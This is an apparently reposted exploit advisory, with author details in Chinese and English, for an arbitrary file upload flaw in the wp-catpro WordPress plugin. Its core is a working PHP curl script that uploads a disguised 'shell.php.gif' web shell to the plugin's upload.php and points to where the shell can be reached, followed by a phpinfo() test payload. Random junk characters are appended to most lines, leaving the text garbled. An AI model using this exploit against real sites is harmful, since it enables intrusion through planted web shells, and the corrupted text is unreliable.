Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability$ t% t( f8 B* D% ^' Q$ ]
#-----------------------------------------------------------------------# q" Z( L/ e' j& `4 K
& G8 }5 W8 d- n作者 => Zikou-16( M! x$ a" {! ~' L7 C
邮箱 => zikou16x@gmail.com
0 a: ~, i: K' \% D测试系统 : Windows 7 , Backtrack 5r3
1 ]8 q% E! q( ~# ]下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip# l" q4 n$ V; G* A8 q/ S
####9 H6 z6 t: u) K; q0 E1 A; L
1 H/ x+ d* w' o8 ]0 s; _# ^1 d
#=> Exploit 信息:! `- z; M# D7 U' V& @
------------------
' ]# o0 y0 _6 `7 N. @" N1 t2 R6 w# 攻击者可以上传 file/shell.php.gif2 a) r& E7 Z) @1 L, r
# ("jpg", "gif", "png") // Allowed file extensions
$ R4 q; t% `4 v }# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)/ T: g; a6 ~% P
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
; r2 C* d# \! B------------------
) O# |3 |; ?7 r
1 O; R; } C6 T9 g- B/ V! T#=> Exploit
' e& \/ `5 e0 I* A7 o, e-----------
) I2 |; N _7 `! _<?php) b6 { d2 P& C6 [) |
l# e+ x' i( l/ L
$uploadfile="zik.php.gif";9 M0 J% V* P+ {1 |' U* h6 b& ?
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");: ?0 v4 C3 q6 C( U
curl_setopt($ch, CURLOPT_POST, true);+ B" ~" X- O) B4 Z& k9 E' Z2 @
curl_setopt($ch, CURLOPT_POSTFIELDS,4 J K: L2 O; Z* \
array('Filedata'=>"@$uploadfile",$ M1 T* Z2 d& a) Z- h
'folder'=>'/wp-content/uploads/catpro/'));) O) v) M- a( [
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);3 X4 j9 w7 p( H# m
$postResult = curl_exec($ch);
' s3 L& F0 }8 `8 _: ~curl_close($ch);
: y& Z8 K/ W1 C; U 7 o$ _4 W- O, X/ C) T! k
print "$postResult";
+ T1 d" w' g. A
! G: @ n. |9 TShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif8 \- x; f- ?$ [: r" a
?>
' U! }% F3 N/ j* ?" z" c# s: A3 w<?php
* f6 R5 G) Q1 Sphpinfo();: i0 i# U! C2 z* i- u
?> |